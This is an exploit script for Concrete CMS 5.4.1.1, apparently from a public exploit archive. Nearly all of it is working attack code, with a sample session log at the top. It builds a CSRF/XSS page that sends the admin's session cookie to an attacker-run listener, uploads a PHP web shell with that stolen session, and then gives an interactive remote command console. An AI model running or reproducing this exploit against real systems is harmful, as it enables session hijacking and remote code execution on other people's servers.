Concrete CMS 5.4.1.1 XSS / Code Execution

`#!/usr/bin/python  
# Concrete CMS v5.4.1.1 xss/remote code execution exploit  
# Download: http://www.concrete5.org/  
# Special Zeitgeist pre release - "Moving Forward" - 15th Jan 2011  
# "They must find it difficult, those who take authority as the truth instead of truth as the authority"  
# http://www.zeitgeistmovie.com/  
# PoC usage:  
# [mr_me@pluto concrete5]$ ./concrete_smash.py -t 192.168.1.17 -d /webapps/concrete5/ -p 8080 -s suntzu -i wlan0  
#  
# | --------------------------------------------------- |  
# | Concrete CMS v5.4.1.1 Remote Code Execution Exploit |  
# | by mr_me - net-ninja.net -------------------------- |  
#  
# (+) Created XSS in index.html, send the XSS to the admin  
# (+) Listening on port 8080 for our target  
# (+) Recieved a connection from 192.168.1.2  
# (+) Confirmed target @ http://192.168.1.17/webapps/concrete5/index.php/dashboard/scrapbook/  
# (+) Got the cookie 2b2rf4s3fnuu72rn2sbqonesp4, checking if we have admin access..  
# (+) Admin access is confirmed  
# (+) Determining the upload nounce  
# (+) Got the file upload nounce, uploading 'suntzu' shell..  
# (+) Shell uploaded! Now looking for it  
# (!) Shell found at http://192.168.1.17/webapps/concrete5/files/7312/9378/6243/suntzu.php.xla  
# (+) Entering interactive remote console (q for quit)  
#  
# [email protected]# id  
# uid=33(www-data) gid=33(www-data) groups=33(www-data)  
#  
# [email protected]# q  
#  
# [mr_me@pluto concrete5]$  
  
import socket, sys, urllib2, re, struct, fcntl, getpass  
from optparse import OptionParser  
  
usage = "./%prog -t [target] -d [path] -p [port] -s [shell name] -i [interface]"  
usage += "\nExample: ./%prog -t 192.168.1.17 -d /webapps/concrete5/ -p 8080 -s suntzu -i wlan0"  
  
parser = OptionParser(usage=usage)  
parser.add_option("-t", type="string", action="store", dest="target",  
help="Target server as IP or host")  
parser.add_option("-d", type="string", action="store", dest="path",  
help="Directory path of Concrete CMS of your target")  
parser.add_option("-p", type="string",action="store", dest="port",  
help="Server port to listen on")  
parser.add_option("-s", type="string", action="store", dest="shellName",  
help="shell name to write on the target server")  
parser.add_option("-i", type="string", action="store", dest="ifce",  
help="External network interface, must be routable.")  
  
(options, args) = parser.parse_args()  
  
def banner():  
print "\n\t| --------------------------------------------------- |"  
print "\t| Concrete CMS v5.4.1.1 Remote Code Execution Exploit |"  
print "\t| by mr_me - net-ninja.net -------------------------- |\n"  
  
if len(sys.argv) < 10:  
banner()  
parser.print_help()   
sys.exit(1)  
  
# set the php code injection (just an example here)  
phpShell = "<?php system($_GET['cmd']); ?>"  
myCmd = "?cmd="  
  
def get_ip_address(ifname):  
ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
return socket.inet_ntoa(fcntl.ioctl(ls.fileno(), 0x8915, struct.pack('256s', ifname[:15]))[20:24])  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.bind(("", int(options.port)))  
s.listen(1)  
  
def sendPostRequest(req):  
su = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
# change the port to another, if they are running the CMS off another port (443?)  
try:  
su.connect((options.target,80))  
except:  
print "(-) Failed making the connection to target %s" % options.target  
su.send(req)  
data = su.recv(1024)  
su.close()  
return data  
  
def generateShellUpload(cookie, ccm_token):  
postRequest = ("POST %sindex.php/tools/required/files/importers/single HTTP/1.1\r\n"  
"Host: %s\r\n"  
"Cookie: CONCRETE5=%s;\r\n"  
"Content-Type: multipart/form-data; boundary=---------------------------lulz\r\n"  
"Content-Length: 313\r\n\n"  
"-----------------------------lulz\n"  
"Content-Disposition: form-data; name=\"Filedata\"; filename=\"%s.php.xla\"\r\n\n"  
"%s\n"  
"-----------------------------lulz\n"  
"Content-Disposition: form-data; name=\"ccm_token\"\r\n\n"  
"%s\n"  
"-----------------------------lulz--\r\n\r\n" % (options.path, options.target, cookie, options.shellName, phpShell, ccm_token))  
  
return postRequest  
  
def xssTheAdmin():  
print "(+) Created XSS in index.html, send the XSS to the admin"  
print "(+) Listening on port %s for our target" % (options.port)  
xssJunk = ("<html><body onload='document.f.submit()'>"  
"<form method=post name=f action=\"http://%s%sindex.php/dashboard/scrapbook/addScrapbook/\">"  
"<input name=\"scrapbookName\" type=\"hidden\" value='<script>document.location=\"http://%s:%s/cookie=\"+document.cookie+\"=\"</script>'>"  
"<input type=\"hidden\" value=\"Add\" ></form>"  
"</html>" % (options.target, options.path, get_ip_address(options.ifce),options.port))  
try:  
xssFile = open('index.html','w')  
xssFile.write(xssJunk)  
xssFile.close()  
except:  
print "(-) Error writing file.."  
sys.exit(1)  
  
def sendPayloads(uri, magicCookie):  
try:  
req = urllib2.Request(uri)  
req.add_header('Cookie', 'CONCRETE5='+magicCookie)  
check = urllib2.urlopen(req).read()  
except urllib.error.HTTPError, error:  
check = error.read()  
except urllib.error.URLError:  
print "(-) Target connection failed, check your address"  
sys.exit(1)  
return check  
  
def interactiveAttack(ws):  
print "(+) Entering interactive remote console (q for quit)\n"  
hn = "%s@%s# " % (getpass.getuser(), options.target)  
cmd = ""  
while cmd != 'q':  
cmd = raw_input(hn)  
cmdResponse = sendPayloads(ws+myCmd+cmd,"lolnoauth")  
print cmdResponse  
  
def startShellAttack():  
conn, addr = s.accept()  
print "(+) Recieved a connection from %s" % addr[0]  
while 1:  
try:  
data = conn.recv(1024)  
cookie = data.split("CONCRETE5=")[1].split("=")[0].rstrip()  
target = data.split("Referer: ")[1].rstrip()  
  
confirmTarget = "http://"+options.target+options.path+"index.php/dashboard/scrapbook/"  
if target == confirmTarget:  
print "(+) Confirmed target @ %s" % (target)  
else:  
print "(-) Error, mismatch of targets."  
sys.exit(1)  
print "(+) Got the cookie %s, checking if we have admin access.." % (cookie)  
adminCheck = sendPayloads(target, cookie)  
if re.search('delete this scrapbook', adminCheck):  
print "(+) Admin access is confirmed"  
else:  
print "(-) This is not an admin cookie. Exiting.."  
sys.exit(1)  
  
print "(+) Determining the upload nounce"  
nounceRequest = "http://"+options.target+options.path+"index.php/dashboard/files/search/"  
nounceResponse = sendPayloads(nounceRequest, cookie)  
ccm_token = nounceResponse.split("<input type=\"hidden\" name=\"ccm_token\" value=\"")[1].split("\" />")[0]  
print ("(+) Got the file upload nounce, uploading '%s' shell.." % (options.shellName))  
uploadReq = generateShellUpload(cookie, ccm_token)  
findShell = sendPostRequest(uploadReq)  
print "(+) Shell uploaded! Now looking for it"  
magicNum = re.search('(?<=push\()\w+', findShell)  
shellSearchReq = ("http://%s%sindex.php/tools/required/files/properties?fID=%s"  
% (options.target, options.path, magicNum.group(0)))  
shellSearch = sendPayloads(shellSearchReq, cookie)  
shellLoc = shellSearch.split("<th>URL to File</th>")[1].split("</td>")[0].split("=\"2\">")[1]  
print ("(!) Shell found at %s" % (shellLoc))  
break  
except:  
break  
conn.close()  
return shellLoc  
  
if __name__ == "__main__":  
banner()  
xssTheAdmin()  
webShell = startShellAttack()  
interactiveAttack(webShell)  
  
`